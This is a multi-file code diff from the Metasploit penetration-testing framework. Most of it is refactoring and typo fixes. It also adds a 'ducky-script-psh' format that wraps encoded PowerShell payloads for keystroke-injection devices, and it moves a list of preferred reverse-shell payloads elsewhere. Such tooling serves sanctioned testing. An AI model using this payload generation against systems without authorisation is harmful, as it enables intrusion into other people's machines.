          private_val = "#{private_val[0,87]} (TRUNCATED)"
        end
@@ -16,7 +16,8 @@ class Db

  include Msf::Ui::Console::CommandDispatcher
  include Msf::Ui::Console::CommandDispatcher::Common
-  include Msf::Ui::Console::CommandDispatcher::Analyze
+  include Msf::Ui::Console::CommandDispatcher::Db::Common
+  include Msf::Ui::Console::CommandDispatcher::Db::Analyze

  DB_CONFIG_PATH = 'framework/database'

@@ -86,21 +87,6 @@ class Db
    end
  end

-  #
-  # Returns true if the db is connected, prints an error and returns
-  # false if not.
-  #
-  # All commands that require an active database should call this before
-  # doing anything.
-  #
-  def active?
-    if not framework.db.active
-      print_error("Database not connected")
-      return false
-    end
-    true
-  end
-
  @@workspace_opts = Rex::Parser::Arguments.new(
    [ '-h', '--help' ] => [ false, 'Help banner.'],
    [ '-a', '--add' ] => [ true, 'Add a workspace.', '<name>'],
@@ -507,6 +493,7 @@ class Db
        onlyup = true
      when '-o'
        output = val
+        output = ::File.expand_path(output)
      when '-R', '--rhosts'
        set_rhosts = true
      when '-S', '--search'
@@ -694,6 +681,8 @@ class Db
      return @@services_columns
    when '-O', '--order'
      return []
+    when '-o', '--output'
+      return tab_complete_filenames(str, words)
    when '-p', '--port'
      return []
    when '-r', '--protocol'
@@ -923,6 +912,10 @@ class Db
    if words.length == 1
      return @@vulns_opts.option_keys.select { |opt| opt.start_with?(str) }
    end
+    case words[-1]
+    when '-o', '--output'
+      return tab_complete_filenames(str, words)
+    end
  end

  def cmd_vulns_help
@@ -1097,6 +1090,8 @@ class Db
    case words[-1]
    when '-O', '--order'
      return []
+    when '-o', '--output'
+      return tab_complete_filenames(str, words)
    end

    []
@@ -1166,6 +1161,7 @@ class Db
        search_term = val
      when '-o', '--output'
        output_file = val
+        output_file = ::File.expand_path(output_file)
      when '-O'
        if (order_by = val.to_i - 1) < 0
          print_error('Please specify a column number starting from 1')
@@ -2131,48 +2127,6 @@ class Db
    true
  end

-
-  #
-  # Miscellaneous option helpers
-  #
-
-  #
-  # Takes +host_ranges+, an Array of RangeWalkers, and chunks it up into
-  # blocks of 1024.
-  #
-  def each_host_range_chunk(host_ranges, &block)
-    # Chunk it up and do the query in batches. The naive implementation
-    # uses so much memory for a /8 that it's basically unusable (1.6
-    # billion IP addresses take a rather long time to allocate).
-    # Chunking has roughly the same performance for small batches, so
-    # don't worry about it too much.
-    host_ranges.each do |range|
-      if range.nil? or range.length.nil?
-        chunk = nil
-        end_of_range = true
-      else
-        chunk = []
-        end_of_range = false
-        # Set up this chunk of hosts to search for
-        while chunk.length < 1024 and chunk.length < range.length
-          n = range.next_ip
-          if n.nil?
-            end_of_range = true
-            break
-          end
-          chunk << n
-        end
-      end
-
-      # The block will do some
-      yield chunk
-
-      # Restart the loop with the same RangeWalker if we didn't get
-      # to the end of it in this chunk.
-      redo unless end_of_range
-    end
-  end
-
  #######
  private

@@ -1,4 +1,4 @@
-module Msf::Ui::Console::CommandDispatcher::Analyze
+module Msf::Ui::Console::CommandDispatcher::Db::Analyze

  def cmd_analyze_help
    print_line "Usage: analyze [OPTIONS] [addr1 addr2 ...]"
@@ -0,0 +1,60 @@
+# -*- coding: binary -*-
+
+module Msf::Ui::Console::CommandDispatcher::Db::Common
+
+  #
+  # Returns true if the db is connected, prints an error and returns
+  # false if not.
+  #
+  # All commands that require an active database should call this before
+  # doing anything.
+  #
+  def active?
+    unless framework.db.active
+      print_error("Database not connected")
+      return false
+    end
+    true
+  end
+
+  #
+  # Miscellaneous option helpers
+  #
+
+  #
+  # Takes +host_ranges+, an Array of RangeWalkers, and chunks it up into
+  # blocks of 1024.
+  #
+  def each_host_range_chunk(host_ranges, &block)
+    # Chunk it up and do the query in batches. The naive implementation
+    # uses so much memory for a /8 that it's basically unusable (1.6
+    # billion IP addresses take a rather long time to allocate).
+    # Chunking has roughly the same performance for small batches, so
+    # don't worry about it too much.
+    host_ranges.each do |range|
+      if range.nil? or range.length.nil?
+        chunk = nil
+        end_of_range = true
+      else
+        chunk = []
+        end_of_range = false
+        # Set up this chunk of hosts to search for
+        while chunk.length < 1024 and chunk.length < range.length
+          n = range.next_ip
+          if n.nil?
+            end_of_range = true
+            break
+          end
+          chunk << n
+        end
+      end
+
+      # The block will do some
+      yield chunk
+
+      # Restart the loop with the same RangeWalker if we didn't get
+      # to the end of it in this chunk.
+      redo unless end_of_range
+    end
+  end
+end
@@ -21,8 +21,8 @@ class Msf::Ui::Console::CommandDispatcher::Developer

  def initialize(driver)
    super
-    output, status = modified_files
-    @modified_files = status.success? ? output : []
+    output, is_success = modified_files
+    @modified_files = is_success ? output : []
  end

  def name
@@ -80,10 +80,10 @@ class Msf::Ui::Console::CommandDispatcher::Developer
  end

  def reload_changed_files
-    files, status = modified_files
+    files, is_success = modified_files

-    unless status.success?
-      print_error("Git is not available: #{files.chomp}")
+    unless is_success
+      print_error("Git is not available")
      return
    end

@@ -439,10 +439,15 @@ class Msf::Ui::Console::CommandDispatcher::Developer
  def modified_files
    # Using an array avoids shelling out, so we avoid escaping/quoting
    changed_files = %w[git diff --name-only]
-
-    output, status = Open3.capture2e(*changed_files, chdir: Msf::Config.install_root)
-    output = output.split("\n")
-
-    return output, status
+    begin
+      output, status = Open3.capture2e(*changed_files, chdir: Msf::Config.install_root)
+      is_success = status.success?
+      output = output.split("\n")
+    rescue => e
+      elog(e)
+      output = []
+      is_success = false
+    end
+    return output, is_success
  end
 end
@@ -96,12 +96,6 @@ class Evasion

    print_status "Payload Handler Started as Job #{job_id}"
  end
-
-  # This is the same functionality as Exploit::choose_payload, so call it
-  def self.choose_payload(mod)
-    Msf::Ui::Console::CommandDispatcher::Exploit.choose_payload(mod)
-  end
-
 end
 end
 end
@@ -269,64 +269,9 @@ class Exploit
  alias cmd_rerun_help cmd_rexploit_help

  # Select a reasonable default payload and minimally configure it
-  # TODO: Move this somewhere better or make it more dynamic?
  # @param [Msf::Module] mod
  def self.choose_payload(mod)
-    compatible_payloads = mod.compatible_payloads(
-      excluded_platforms: ['Multi'] # We don't want to select a multi payload
-    ).map(&:first)
-
-    # XXX: Determine LHOST based on global LHOST, RHOST or an arbitrary internet address
-    lhost = mod.datastore['LHOST'] || Rex::Socket.source_address(mod.datastore['RHOST'] || '50.50.50.50')
-
-    configure_payload = lambda do |payload|
-      if mod.datastore.is_a?(Msf::DataStoreWithFallbacks)
-        payload_defaults = { 'PAYLOAD' => payload }
-
-        # Set LHOST if this is a reverse payload
-        if payload.index('reverse')
-          payload_defaults['LHOST'] = lhost
-        end
-        mod.datastore.import_defaults_from_hash(payload_defaults, imported_by: 'choose_payload')
-      else
-        mod.datastore['PAYLOAD'] = payload
-        # Set LHOST if this is a reverse payload
-        if payload.index('reverse')
-          mod.datastore['LHOST'] = lhost
-        end
-      end
-
-      payload
-    end
-
-    # If there is only one compatible payload, return it immediately
-    if compatible_payloads.length == 1
-      return configure_payload.call(compatible_payloads.first)
-    end
-
-    # XXX: This approach is subpar, and payloads should really be ranked!
-    preferred_payloads = [
-      # These payloads are generally reliable and common enough in practice
-      '/meterpreter/reverse_tcp',
-      '/shell/reverse_tcp',
-      'cmd/unix/reverse_bash',
-      'cmd/unix/reverse_netcat',
-      'cmd/windows/powershell_reverse_tcp',
-      # Fall back on a generic payload to autoselect a specific payload
-      'generic/shell_reverse_tcp',
-      'generic/shell_bind_tcp'
-    ]
-
-    # XXX: This is not efficient in the slightest
-    preferred_payloads.each do |type|
-      payload = compatible_payloads.find { |name| name.end_with?(type) }
-
-      next unless payload
-
-      return configure_payload.call(payload)
-    end
-
-    nil
+    Msf::Payload.choose_payload(mod)
  end

 end
@@ -1437,6 +1437,18 @@ require 'digest/sha1'
                    method: 'reflection')
  end

+  def self.to_powershell_ducky_script(framework, arch, code)
+    template_path = Rex::Powershell::Templates::TEMPLATE_DIR
+    powershell = Rex::Powershell::Command.cmd_psh_payload(code,
+                    arch,
+                    template_path,
+                    encode_final_payload: true,
+                    method: 'reflection')
+    replacers = {}
+    replacers[:var_payload] = powershell
+    read_replace_script_template("to_powershell.ducky_script.template", replacers)
+  end
+
  def self.to_powershell_hta(framework, arch, code)
    template_path = Rex::Powershell::Templates::TEMPLATE_DIR

@@ -2155,6 +2167,8 @@ require 'digest/sha1'
      Msf::Util::EXE.to_powershell_hta(framework, arch, code)
    when 'python-reflection'
      Msf::Util::EXE.to_python_reflection(framework, arch, code, exeopts)
+    when 'ducky-script-psh'
+      Msf::Util::EXE.to_powershell_ducky_script(framework, arch, code)
    end
  end

@@ -2168,6 +2182,7 @@ require 'digest/sha1'
      "aspx-exe",
      "axis2",
      "dll",
+      "ducky-script-psh",
      "elf",
      "elf-so",
      "exe",
@@ -75,7 +75,6 @@ class MsfAutoload
      "#{__dir__}/msf/core/payload/linux/x64",
      "#{__dir__}/msf/core/web_services/servlet",
      "#{__dir__}/msf/base",
-      "#{__dir__}/msf/ui/console/command_dispatcher/db",
      "#{__dir__}/rex/parser/fs"
    ]
  end
@@ -165,7 +165,7 @@ module Net # :nodoc:
      #   my $res = Net::DNS::Resolver->new(config_file => '/my/dns.conf');
      #
      # This is supported on both UNIX and Windows.  Values pulled from a custom
-      # configuration file override the the system's defaults, but can still be
+      # configuration file override the system's defaults, but can still be
      # overridden by the other arguments to Resolver::new.
      #
      # Explicit arguments to Resolver::new override both the system's defaults
@@ -408,7 +408,7 @@ module Rex
        end

        #
-        # An error describing an issue that occurred while parsing the the data structure.
+        # An error describing an issue that occurred while parsing the data structure.
        #
        class ParserError < GraphMLError
        end
@@ -115,7 +115,9 @@ class CommandMapper

    available_modules = [
      ::Rex::Post::Meterpreter,
-      *::Rex::Post::Meterpreter::ExtensionMapper.get_extension_klasses
+      *::Rex::Post::Meterpreter::ExtensionMapper.get_extension_klasses,
+      # Railgun is a special case that defines extra TLV_TYPES inside an extension
+      Rex::Post::Meterpreter::Extensions::Stdapi::Railgun
    ].uniq

    available_modules.each do |mod|
@@ -290,17 +290,16 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
  # If a block is given, it will be called before each file is uploaded and
  # again when each upload is complete.
  #
-  def File.upload(destination, *src_files, &stat)
+  def File.upload(dest, *src_files, &stat)
    src_files.each { |src|
-      dest = destination
-
-      stat.call('uploading', src, dest) if (stat)
-      if (self.basename(destination) != ::File.basename(src))
-        dest += self.separator + ::File.basename(src)
+      if (self.basename(dest) != ::File.basename(src))
+        dest += self.separator unless dest.end_with?(self.separator)
+        dest += ::File.basename(src)
      end
+      stat.call('Uploading', src, dest) if (stat)

      upload_file(dest, src)
-      stat.call('uploaded', src, dest) if (stat)
+      stat.call('Completed', src, dest) if (stat)
    }
  end

@@ -310,7 +309,7 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
  def File.upload_file(dest_file, src_file, &stat)
    # Open the file on the remote side for writing and read
    # all of the contents of the local file
-    stat.call('uploading', src_file, dest_file) if stat
+    stat.call('Uploading', src_file, dest_file) if stat
    dest_fd = nil
    src_fd = nil
    buf_size = 8 * 1024 * 1024
@@ -330,7 +329,7 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
      src_fd.close unless src_fd.nil?
      dest_fd.close unless dest_fd.nil?
    end
-    stat.call('uploaded', src_file, dest_file) if stat
+    stat.call('Completed', src_file, dest_file) if stat
  end

  def File.is_glob?(name)
@@ -352,7 +351,8 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
      if (::File.basename(dest) != File.basename(src))
        # The destination when downloading is a local file so use this
        # system's separator
-        dest += ::File::SEPARATOR + File.basename(src)
+        dest += ::File::SEPARATOR unless dest.end_with?(::File::SEPARATOR)
+        dest += File.basename(src)
      end

      # XXX: dest can be the same object as src, so we use += instead of <<
@@ -386,7 +386,7 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
      dst_stat = ::File.stat(dest_file)
      if src_stat.size == dst_stat.size && src_stat.mtime == dst_stat.mtime
        src_fd.close
-        return 'skipped'
+        return 'Skipped'
      end
    end

@@ -429,7 +429,7 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
              seek_back = false
              stat.call("Resuming at #{Filesize.new(in_pos).pretty} of #{src_size}", src_file, dest_file)
            else
-              # succesfully read and wrote - reset the counter
+              # successfully read and wrote - reset the counter
              tries_cnt = 0
            end
            adjust_block = true
@@ -477,7 +477,7 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO

    # Clone the times from the remote file
    ::File.utime(src_stat.atime, src_stat.mtime, dest_file)
-    return 'download'
+    return 'Completed'
  end

  #
@@ -31,7 +31,7 @@ class TcpServerChannel < Rex::Post::Meterpreter::Channel
  # Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket. All incoming requests from the meterpreter
  # for a COMMAND_ID_STDAPI_NET_TCP_CHANNEL_OPEN will be processed here. We create a new TcpClientChannel for each request
  # received and store it in the respective tcp server channels list of new pending client channels.
-  # These new tcp client channels are passed off via a call the the tcp server channels accept() method.
+  # These new tcp client channels are passed off via a call the tcp server channels accept() method.
  #
  def self.request_handler(client, packet)
    return false unless packet.method == COMMAND_ID_STDAPI_NET_TCP_CHANNEL_OPEN
@@ -52,7 +52,8 @@ class TcpServerChannel < Rex::Post::Meterpreter::Channel
      }
    )

-    client_channel = TcpClientChannel.new(client, cid, TcpClientChannel, CHANNEL_FLAG_SYNCHRONOUS, packet, {:sock_params => params})
+    client_channel = TcpClientChannel.new(client, cid, TcpClientChannel, CHANNEL_FLAG_SYNCHRONOUS, packet, sock_params: params)
+    ilog("enqueueing new TCP client with channel id #{cid}")

    @@server_channels[server_channel] ||= ::Queue.new
    @@server_channels[server_channel].enq(client_channel)
@@ -338,7 +338,7 @@ class Console::CommandDispatcher::Stdapi::Fs
    true
  end

-  # 
+  #
  # Tab completion for the lcat command
  #
  def cmd_lcat_tabs(str, words)
@@ -1053,7 +1053,7 @@ class Console::CommandDispatcher::Stdapi::Fs
    src_items << last if src_items.empty?

    if args.size == 1
-      dest = last.split(/(\/|\\)/).last
+      dest = client.fs.file.basename(last)
    else
      dest = last
    end
@@ -471,6 +471,7 @@ class Console::CommandDispatcher::Stdapi::Net
            return false
          end

+          print_status("Reverse TCP relay created: (remote) #{rhost}:#{rport} -> (local) #{lhost}:#{lport}")
        else
          # Validate parameters
          unless lport && rhost && rport
@@ -486,10 +487,9 @@ class Console::CommandDispatcher::Stdapi::Net
            'MeterpreterRelay'  => true,
            'OnLocalConnection' => Proc.new { |relay, lfd| create_tcp_channel(relay) })
          lport = relay.opts['LocalPort']
+
+          print_status("Forward TCP relay created: (local) #{lhost}:#{lport} -> (remote) #{rhost}:#{rport}")
        end
-
-        print_status("Local TCP relay created: #{lhost}:#{lport} <-> #{rhost}:#{rport}")
-
      # Delete local port forwards
      when 'delete', 'remove', 'del', 'rm'

@@ -41,6 +41,234 @@ class Net::LDAP::Connection # :nodoc:

    yield self if block_given?
  end
+
+  # Monkeypatch upstream library for now to support :control
+  # hash option in `args` so that we can provide controls within
+  # searches. Needed so we can specify the LDAP_SERVER_SD_FLAGS_OID
+  # flag for searches to prevent getting the SACL when querying for
+  # ntSecurityDescriptor, as this is retrieved by default and non-admin
+  # users are not allowed to retrieve SACLs for objects. Therefore by
+  # adjusting the search to not retrieve SACLs, non-admin users can still
+  # retrieve information about the security of objects without violating this rule.
+  #
+  # @see https://github.com/rapid7/metasploit-framework/issues/17324
+  # @see https://github.com/ruby-ldap/ruby-net-ldap/pull/411
+  #
+  # @param [Hash] args A hash of the arguments to be utilized by the search operation.
+  #
+  # @return [Net::LDAP::PDU] A Protocol Data Unit (PDU) object, represented by the Net::LDAP::PDU class, containing the results of the search operation.
+  #
+  def search(args = nil)
+    args ||= {}
+
+    # filtering, scoping, search base
+    # filter: https://tools.ietf.org/html/rfc4511#section-4.5.1.7
+    # base:   https://tools.ietf.org/html/rfc4511#section-4.5.1.1
+    # scope:  https://tools.ietf.org/html/rfc4511#section-4.5.1.2
+    filter = args[:filter] || Net::LDAP::Filter.eq("objectClass", "*")
+    base   = args[:base]
+    scope  = args[:scope] || Net::LDAP::SearchScope_WholeSubtree
+
+    # attr handling
+    # attrs:      https://tools.ietf.org/html/rfc4511#section-4.5.1.8
+    # attrs_only: https://tools.ietf.org/html/rfc4511#section-4.5.1.6
+    attrs  = Array(args[:attributes])
+    attrs_only = args[:attributes_only] == true
+
+    # references
+    # refs:  https://tools.ietf.org/html/rfc4511#section-4.5.3
+    # deref: https://tools.ietf.org/html/rfc4511#section-4.5.1.3
+    refs   = args[:return_referrals] == true
+    deref  = args[:deref] || Net::LDAP::DerefAliases_Never
+
+    # limiting, paging, sorting
+    # size: https://tools.ietf.org/html/rfc4511#section-4.5.1.4
+    # time: https://tools.ietf.org/html/rfc4511#section-4.5.1.5
+    size   = args[:size].to_i
+    time   = args[:time].to_i
+    paged  = args[:paged_searches_supported]
+    sort   = args.fetch(:sort_controls, false)
+
+    # arg validation
+    raise ArgumentError, "search base is required" unless base
+    raise ArgumentError, "invalid search-size" unless size >= 0
+    raise ArgumentError, "invalid search scope" unless Net::LDAP::SearchScopes.include?(scope)
+    raise ArgumentError, "invalid alias dereferencing value" unless Net::LDAP::DerefAliasesArray.include?(deref)
+
+    # arg transforms
+    filter = Net::LDAP::Filter.construct(filter) if filter.is_a?(String)
+    ber_attrs = attrs.map { |attr| attr.to_s.to_ber }
+    ber_sort  = encode_sort_controls(sort)
+
+    # An interesting value for the size limit would be close to A/D's
+    # built-in page limit of 1000 records, but openLDAP newer than version
+    # 2.2.0 chokes on anything bigger than 126. You get a silent error that
+    # is easily visible by running slapd in debug mode. Go figure.
+    #
+    # Changed this around 06Sep06 to support a caller-specified search-size
+    # limit. Because we ALWAYS do paged searches, we have to work around the
+    # problem that it's not legal to specify a "normal" sizelimit (in the
+    # body of the search request) that is larger than the page size we're
+    # requesting. Unfortunately, I have the feeling that this will break
+    # with LDAP servers that don't support paged searches!!!
+    #
+    # (Because we pass zero as the sizelimit on search rounds when the
+    # remaining limit is larger than our max page size of 126. In these
+    # cases, I think the caller's search limit will be ignored!)
+    #
+    # CONFIRMED: This code doesn't work on LDAPs that don't support paged
+    # searches when the size limit is larger than 126. We're going to have
+    # to do a root-DSE record search and not do a paged search if the LDAP
+    # doesn't support it. Yuck.
+    rfc2696_cookie = [126, ""]
+    result_pdu = nil
+    n_results = 0
+
+    message_id = next_msgid
+
+    instrument "search.net_ldap_connection",
+               message_id: message_id,
+               filter:     filter,
+               base:       base,
+               scope:      scope,
+               size:       size,
+               time:       time,
+               sort:       sort,
+               referrals:  refs,
+               deref:      deref,
+               attributes: attrs do |payload|
+      loop do
+        # should collect this into a private helper to clarify the structure
+        query_limit = 0
+        if size > 0
+          query_limit = if paged
+                          (((size - n_results) < 126) ? (size - n_results) : 0)
+                        else
+                          size
+                        end
+        end
+
+        request = [
+          base.to_ber,
+          scope.to_ber_enumerated,
+          deref.to_ber_enumerated,
+          query_limit.to_ber, # size limit
+          time.to_ber,
+          attrs_only.to_ber,
+          filter.to_ber,
+          ber_attrs.to_ber_sequence,
+        ].to_ber_appsequence(Net::LDAP::PDU::SearchRequest)
+
+        # rfc2696_cookie sometimes contains binary data from Microsoft Active Directory
+        # this breaks when calling to_ber. (Can't force binary data to UTF-8)
+        # we have to disable paging (even though server supports it) to get around this...
+
+        user_controls = args.fetch(:controls, [])
+        controls = []
+        controls <<
+          [
+            Net::LDAP::LDAPControls::PAGED_RESULTS.to_ber,
+            # Criticality MUST be false to interoperate with normal LDAPs.
+            false.to_ber,
+            rfc2696_cookie.map(&:to_ber).to_ber_sequence.to_s.to_ber,
+          ].to_ber_sequence if paged
+        controls << ber_sort if ber_sort
+        if controls.empty? && user_controls.empty?
+          controls = nil
+        else
+          controls += user_controls
+          controls = controls.to_ber_contextspecific(0)
+        end
+
+        write(request, controls, message_id)
+
+        result_pdu = nil
+        controls = []
+
+        while pdu = queued_read(message_id)
+          case pdu.app_tag
+          when Net::LDAP::PDU::SearchReturnedData
+            n_results += 1
+            yield pdu.search_entry if block_given?
+          when Net::LDAP::PDU::SearchResultReferral
+            if refs
+              if block_given?
+                se = Net::LDAP::Entry.new
+                se[:search_referrals] = (pdu.search_referrals || [])
+                yield se
+              end
+            end
+          when Net::LDAP::PDU::SearchResult
+            result_pdu = pdu
+            controls = pdu.result_controls
+            if refs && pdu.result_code == Net::LDAP::ResultCodeReferral
+              if block_given?
+                se = Net::LDAP::Entry.new
+                se[:search_referrals] = (pdu.search_referrals || [])
+                yield se
+              end
+            end
+            break
+          else
+            raise Net::LDAP::ResponseTypeInvalidError, "invalid response-type in search: #{pdu.app_tag}"
+          end
+        end
+
+        if result_pdu.nil?
+          raise Net::LDAP::ResponseMissingOrInvalidError, "response missing"
+        end
+
+        # count number of pages of results
+        payload[:page_count] ||= 0
+        payload[:page_count]  += 1
+
+        # When we get here, we have seen a type-5 response. If there is no
+        # error AND there is an RFC-2696 cookie, then query again for the next
+        # page of results. If not, we're done. Don't screw this up or we'll
+        # break every search we do.
+        #
+        # Noticed 02Sep06, look at the read_ber call in this loop, shouldn't
+        # that have a parameter of AsnSyntax? Does this just accidentally
+        # work? According to RFC-2696, the value expected in this position is
+        # of type OCTET STRING, covered in the default syntax supported by
+        # read_ber, so I guess we're ok.
+        more_pages = false
+        if result_pdu.result_code == Net::LDAP::ResultCodeSuccess and controls
+          controls.each do |c|
+            if c.oid == Net::LDAP::LDAPControls::PAGED_RESULTS
+              # just in case some bogus server sends us more than 1 of these.
+              more_pages = false
+              if c.value and c.value.length > 0
+                cookie = c.value.read_ber[1]
+                if cookie and cookie.length > 0
+                  rfc2696_cookie[1] = cookie
+                  more_pages = true
+                end
+              end
+            end
+          end
+        end
+
+        break unless more_pages
+      end # loop
+
+      # track total result count
+      payload[:result_count] = n_results
+
+      result_pdu || OpenStruct.new(:status => :failure, :result_code => Net::LDAP::ResultCodeOperationsError, :message => "Invalid search")
+    end # instrument
+  ensure
+
+    # clean up message queue for this search
+    messages = message_queue.delete(message_id)
+
+    # in the exceptional case some messages were *not* consumed from the queue,
+    # instrument the event but do not fail.
+    if !messages.nil? && !messages.empty?
+      instrument "search_messages_unread.net_ldap_connection",
+                 message_id: message_id, messages: messages
+    end
+  end
 end

 module Rex
@@ -7,22 +7,37 @@ module Rex::Proto::MsDtyp
    hide   :reserved0, :reserved1

    # the protocol field id reserved for protocol-specific access rights
-    bit16 :protocol
+    uint16 :protocol

-    bit3  :reserved0
-    bit1  :sy
-    bit1  :wo
-    bit1  :wd
-    bit1  :rc
-    bit1  :de
+    bit3   :reserved0
+    bit1   :sy
+    bit1   :wo
+    bit1   :wd
+    bit1   :rc
+    bit1   :de

-    bit1  :gr
-    bit1  :gw
-    bit1  :gx
-    bit1  :ga
-    bit2  :reserved1
-    bit1  :ma
-    bit1  :as
+    bit1   :gr
+    bit1   :gw
+    bit1   :gx
+    bit1   :ga
+    bit2   :reserved1
+    bit1   :ma
+    bit1   :as
+    def bit_names
+      names = []
+      names << :GENERIC_READ if self.gr != 0
+      names << :GENERIC_WRITE if self.gw != 0
+      names << :GENERIC_EXECUTE if self.gx != 0
+      names << :GENERIC_ALL if self.ga != 0
+      names << :MAXIMUM_ALLOWED if self.ma != 0
+      names << :ACCESS_SYSTEM_SECURITY if self.as != 0
+      names << :SYNCHRONIZE if self.sy != 0
+      names << :WRITE_OWNER if self.wo != 0
+      names << :WRITE_DACL if self.wd != 0
+      names << :READ_CONTROL if self.rc != 0
+      names << :DELETE if self.de != 0
+      names
+    end

    ALL  = MsDtypAccessMask.new({ gr: 1, gw: 1, gx: 1, ga: 1, ma: 1, as: 1, sy: 1, wo: 1, wd: 1, rc: 1, de: 1, protocol: 0xffff })
    NONE = MsDtypAccessMask.new({ gr: 0, gw: 0, gx: 0, ga: 0, ma: 0, as: 0, sy: 0, wo: 0, wd: 0, rc: 0, de: 0, protocol: 0 })
@@ -113,15 +128,15 @@ module Rex::Proto::MsDtyp
  class MsDtypAceNonObjectBody < BinData::Record
    endian :little

-    uint32             :access_mask
-    ms_dtyp_sid        :sid, byte_align: 4
+    ms_dtyp_access_mask :access_mask
+    ms_dtyp_sid         :sid, byte_align: 4
  end

  class MsDtypAceObjectBody < BinData::Record
    endian :little

-    uint32             :access_mask
-    struct             :flags do
+    ms_dtyp_access_mask :access_mask
+    struct              :flags do
      bit1 :reserved5
      bit1 :reserved4
      bit1 :reserved3
@@ -131,9 +146,9 @@ module Rex::Proto::MsDtyp
      bit1 :ace_inherited_object_type_present
      bit1 :ace_object_type_present
    end
-    ms_dtyp_guid       :object_type, onlyif: -> { flags.ace_object_type_present != 0x0 }
-    ms_dtyp_guid       :inherited_object_type, onlyif: -> { flags.ace_inherited_object_type_present != 0x0 }
-    ms_dtyp_sid        :sid, byte_align: 4
+    ms_dtyp_guid        :object_type, onlyif: -> { flags.ace_object_type_present != 0x0 }
+    ms_dtyp_guid        :inherited_object_type, onlyif: -> { flags.ace_inherited_object_type_present != 0x0 }
+    ms_dtyp_sid         :sid, byte_align: 4
  end

  # [2.4.4.2 ACCESS_ALLOWED_ACE](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/72e7c7ea-bc02-4c74-a619-818a16bf6adb)
--- a/Show More
+++ b/Show More
@@ -1 +1 @@
 .0.2
 .0.5